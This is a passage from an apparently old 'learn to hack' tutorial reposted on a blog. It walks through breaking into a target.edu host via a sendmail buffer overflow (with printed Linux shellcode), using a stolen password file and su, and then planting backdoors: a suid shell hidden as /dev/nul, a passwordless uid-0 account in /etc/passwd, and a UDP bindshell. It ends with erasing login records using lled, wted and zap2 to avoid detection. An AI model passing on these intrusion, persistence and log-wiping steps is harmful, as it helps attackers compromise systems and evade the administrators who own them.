But this is not a really good way. It can create logs that will make the admin to detect us.

Avoid uploading it with FTP as you can, use cut&paste instead.

Here's how to make it:

we run a text editor
             sh-2.03$ pico exploit.c
if it doesn't work, try this one:
             sh-2.03$ vi exploit.c
Of course, you must learn how to use vi.

Then open another terminal (i mean without x windows, CTRL+ALT+Fx to scape from xwindows to x,
 ALT+Fx to change to another terminal, ALT+F7 to return xwindows) on your own box and cut the
text from it. Change to your target and paste the code so you've 'uploaded' the file.

To cut a text from the screen, you need to install the gpm packet from your linux distribution.
This program lets you select and cut text with your mouse.

If cut&paste doesn't work, you can also type it by hand (they aren't usually large).

Once you get the .c file there, here's how to compile:

             sh-2.03$ gcc program.c -o program

and execute:

             sh-2.03$ ./program



                                Exploiting vulnerabilities
                                ~~~~~~~~~~~~~~~~~~~~~~~~~~

This is the most important part of our hacking experience. Once we know what target.edu
is running, we can go to one of those EXPLOIT databases that are on the net.

A exploit is a piece of code that exploits a vulnerability on its software. In the case of
target.edu, we should look for an adequate exploit for sendmail 8.11.0 or any other daemon
that fits. Note that sendmail is the buggiest and the shittiest daemon, thus the most easy
exploitable. If your target gots an old version, you'll probably get in easyly.

When we exploit a security bug, we can get:

- a normal shell (don't know what a shell is? read a book of unix!)

a shell is a command interpreter. for example, the windoze 'shell' is the command.com file.
this one lets us send commands to the box, but we got limited priviledges.
- a root shell
this is our goal, once we're root, we can do EVERYTHING on our 'rooted' box.

These are some exploit databases i suggest you to visit:

www.hack.co.za
www.r00tabega.org
www.rootshell.com
www.securityfocus.com
www.insecure.org/sploits.html

Every exploit is different to use, so read its text and try them.
They usually come in .c language.

The most standar and easy to use exploits are buffer overflows.
I won't explain here how a buffer overflow does work,
Read "Smash The Stack For Fun And Profit" by Aleph One to learn it.
You can download it from my site. (www.3b0x.com)

Buffer overflows fool a program (in this case sendmail) to make it execute the code you want.
This code usually executes a shell, so it's called 'shellcode'. The shellcode to run a shell
is different to every OS, so this is a strong reason to know what OS they're running.

We edit the .c file we've downloaded and look for something like this:

char shellcode[] =
             "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
             "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
             "\x80\xe8\xdc\xff\xff\xff/bin/sh";

This is a shellcode for Linux. It will execute /bin/sh, that is, a shell.

You gotta replace it by the shellcode for the OS your target is running.
You can find shellcodes for most OSes on my site or create your own by reading
the text i mentioned before (Smash The Stack For Fun And Profit).

IMPORTANT: before continuing with the practice, ask your target for permission to hack them.
           if they let you do it, then you shall continue.
           if they don't give you permission, STOP HERE and try with another one.
           shall you continue without their permission, you'd be inquiring law and
           i'm not responible of your craziness in any way!!!

You should have now the shell account, this is the time to use it!

everything i explain on this section, do it through your shell account:

             bash-2.03$ telnet myshellaccount 23
             Trying xx.xx.xx.xx...
             Connected to yourshellaccount.
             Escape character is '^]'.
      Welcome to yourshellaccount
      login: malicioususer
      Password: (it doesn't display)
      Last login: Fry Sep 15 11:45:34 from <yourIPaddress>.
             sh-2.03$

Here is a example of a buffer overflow (that doesn't really exist):

we compile it:
             sh-2.03$ gcc exploit.c -o exploit
we execute it:
             sh-2.03$ ./exploit
             This is a sendmail 8.9.11 exploit
             usage: ./exploit target port
Sendmail works on port 25, so:
             sh-2.03$./exploit 25 target.edu
Cool, '$' means we got a shell! Let's find out if we're root.
             $whoami
             root
Damn, we've rooted target.edu!
             $whyamiroot
             because you've hacked me! :-) (just kidding)

There are some exploits that don't give you root directly, but a normal shell.
It depends on what luser is running the daemon. (sendmail is usually root)
Then you'll have to upload a .c file with a local (local means it can't overflow
a daemon, but a local program) overflow and compile it.

Remember to avoid uploading it with FTP as you can.

Other kind of exploit is the one that gives you access to the password file.
If a host gots port 23 (telnet) opened, we can login as a normal user
(remote root logins are usually not allowed) by putting his/hers/its username
and password. Then use the su command to become root.

             sh-2.03$ telnet target.edu 23
             Trying xx.xx.xx.xx...
             Connected to target.edu.
             Escape character is '^]'.
      We're running SunOS 5.7
      Welcome to target.edu         

      login: luser
      Password: (it doesn't display)
      Last login: Fry Sep 22 20:47:59 from xx.xx.xx.xx.
      sh-2.03$ whoami
             luser
Are we lusers?
             sh-2.03$ su root
             Password:
Don't think so...
             sh-2.03$ whoami
             root
             sh-2.03$

Let's see what happened. We've stolen the password file (/etc/shadow) using an exploit.
Then, let's suppose we've extracted the password from luser and root. We can't login as
root so we login as luser and run su. su asks us for the root password, we put it and...
rooted!!

The problem here is that is not easy to extract a root password from a password file.
Only 1/10 admins are idiot enough to choose a crackable password like a dictinonary word
or a person's name.

I said some admins are idiot (some of them are smart), but lusers are the more most
idiotest thing on a system. You'll find that luser's passwords are mostly easyly cracked,
you'll find that lusers set up rlogin doors for you to enter without a password, etc.
Not to mention what happens when an admin gives a normal luser administrator priviledges
with sudo or something.

To learn how to crack a password file and extract its passwords, download a document called
"cracking UNIX passwords" by Zebal. You can get it from my site (www.3b0x.com).

Of course, I haven't listed all the exploit kinds that exist, only the most common.



                                  Putting backdoors
                                  ~~~~~~~~~~~~~~~~~

Ok, we've rooted the system. Then what?

Now you're able to change the webpage of that .edu box. Is that what you want to do?
Notice that doing such a thing is LAMER attitude. everyone out there can hack an .edu
box, but they're not ashaming them with such things.

Hacktivism is good and respected. You can change the page of bad people with bad ideologies
like nazis, scienciologists, bsa.org, microsoft, etc. Not a bunch of poor educators.

REMEMBER: ask for permission first!

No, this time you should do another thing. You should keep that system for you to play with
as a toy! (remember: your_box --> lame_box --> victim's box)

Once we type "exit" on our login shell, we're out. And we gotta repeat all the process to get
back in.
And it may not be possible:
- the admin changed his password to something uncrackable.
- they updated sendmail to a newer version so the exploit doesn't work.

So now we're root and we can do everything, we shall put some backdoors that let us get back in.

It may be interesting to read the paper about backdoors I host on my site. (www.3b0x.com)

Anyway, i'll explain the basics of it.

1.How to make a sushi:

  To make a sushi or suid shell, we gotta copy /bin/sh to some hidden place and give it suid
  permissions:

             sh-2.03$ cp /bin/sh /dev/nul
In the strange case the admin looks at /dev, he wouldn't find something unusual cause
/dev/null does exist (who notices the difference?).
             sh-2.03$ cd /dev
             sh-2.03$ chown root nul
Should yet be root-owned, but anyway...
             sh-2.03$ chmod 4775 nul
4775 means suid, note that "chmod +s nul" wouldn't work on some systems but this works everywhere.

We've finished our 'duty', let's logout:
             sh-2.03$ exit

Then, when we come back some day:
             sh-2.03$ whoami
             luser
             sh-2.03$ /dev/nul
             sh-2.03$ whoami
             root
We're superluser again!


There's one problem: actually most shells drop suid permissions, so the sushi doesn't work.
we'd upload then the shell we want and make a sushi with it.
The shell we want for this is SASH. A stand-alone shell with built-in commands.
This one doesn't drop suid perms, and the commands are built-in, so external commands
can't drop perms too! Remember to compile it for the architecture of the target box.
Do you know where to get sash from? From my site :-). (www.3b0x.com)

2.How to add fake lusers.

You gotta manipulate the users file: /etc/passwd
try this:
             sh-2.03$ pico /etc/passwd
if it doesn't work, try this:
             sh-2.03$ vi /etc/passwd
Of course, you must learn how to use vi.

This is what a luser line looks like:  luser:passwd:uid:gid:startdir:shell

When uid=0 and gid=0, that luser gets superluser priviledges.

Then we add a line like this:

 dood::0:0:dood:/:/bin/sh        (put it in a hidden place)


So, once we get a shell, we type:
             sh-2.03$ su dood
             sh-2.03$ whoami
             dood

And now we're root because dood's uid=0 and gid=0.

Smart admins usually look for anomalities on /etc/passwd. The best way is to use a fake
program in /bin that executes the shell you want with suid perms.

I haven't got such a program at my site, but it shouldn't be difficult to develope.


3.How to put a bindshell.

A bindshell is a daemon, it's very similar to telnetd (in fact, telnetd is a bindshell).
The case is this is our own daemon. The good bindshells will listen to an UDP port (not TCP)
and give a shell to you when you connect. The cool thing of UDP is this:

If the admin uses a scanner to see what TCP ports are open, he woldn't find anything!
They rarely remember UDP exists.

You can get an UDP bindshell coded by !hispahack from my site.


                                     Cleaning up
                                     ~~~~~~~~~~~

Remember when we logedin to target.edu as luser, and used su to become root?
Take a look to this line:

      Last login: Fry Sep 22 20:47:59 from xx.xx.xx.xx.

Yes, that was displayed by the target box when we logedin there.
It refers to the last login that the real luser did.

So, what will be displayed when luser logsin again?

      Last login: Sun Sep 24 10:32:14 from <yourIPaddress>.

Then luser writes a mail to the admin:

"It has happen some strange thing, when I loggedin today, I've read a line like this:

 Last login: Sun Sep 24 10:32:14 from <yourIPaddress>.

 Does it mean I did login yesterday? It can't be, I don't work on sundays!
 I think it's a bug and this is your fault."

The admin responds to luser:

"That wasn't a bug! this line means someone acceded the system using your password, don't
 worry for that, we got his IP. That means we can ask his ISP what phone number did call
 at 10:32 and get <yourIPaddress>. Then we shall call the police and he'll get busted"

So you'll get busted because luser was a bit clever (sometimes happens).

So we gotta find a way to delete that.

This information can be stored in:

/usr/adm/lastlog
/var/adm/lastlog
/var/log/lastlog

and we can erase it using lled (get it from my site)

lled gots a buitin help that explains how to use it, remember to chmod the fake file
created by lled like the substitute lastlog file.

There is also some information we'd like to erase:

Remember when i told you not to use FTP? Well, in case you did it, you must now
use wted to clean up. Its sintax is very similar to lled.
you can get it from my site.


The who command shows us (and the admin) which lusers are logedin at the moment.
What if we login and the admin is there?

             sh-2.03$ who
             root     tty1     Sep 25 18:18

Then we shall use zap2. If you loggedin as 'luser', then type:

             sh-2.03$ ./zap2 luser
             Zap2!
             sh-2.03$ who
             sh-2.03$

And luser has never been here.


                                        Greetings
                                        ~~~~~~~~~

Ok, this is all for now (i'll make a newer version). I hope it has been useful to you and you
decide to continue learning and become a real hacker. You can visit my site (www.3b0x.com)
for more advanced tutorials so you can improve your skills.

I'd get very happy if you send me a mail telling me your impression about this paper (wether
is good or bad), and you help me to improve it.

I'd like to send my greetings to every hacker that has tought me in any way, through newsgroups
or other tutorials like this one. thanks to all.


                                                      This paper was written on 26-9-00 by TDC
 

·        Follow-Ups:
·        Re: Learn to hack hotmail and icq and aol
·        From: diggitydog46@hotmail.com
·        Re: Learn to hack in easy steps
·        From: Pornaddict2000<aron_58@mail.com>
·        Re: Learn to hack in easy steps
·        From: asterixx@post.cz
·        Re: Learn to hack in easy steps
·        From: shane4444@hotmail.com
·        Re: Learn to hack in easy steps
·        From: Keith Koeppen<Joy_ride80@yahoo.com>
·        Prev by Date: Re: i can hack hotmail for free and in minutes
·        Next by Date: Re: Profile of a person using hotmail
·        Prev by thread: i can´t find a hotmail password!!!
·        Next by thread: Re: Learn to hack in easy steps
·        Index(es):
·        Date
·        Thread

Posted by ojana at 18:36 0 comments

 
Subscribe to: Posts (Atom)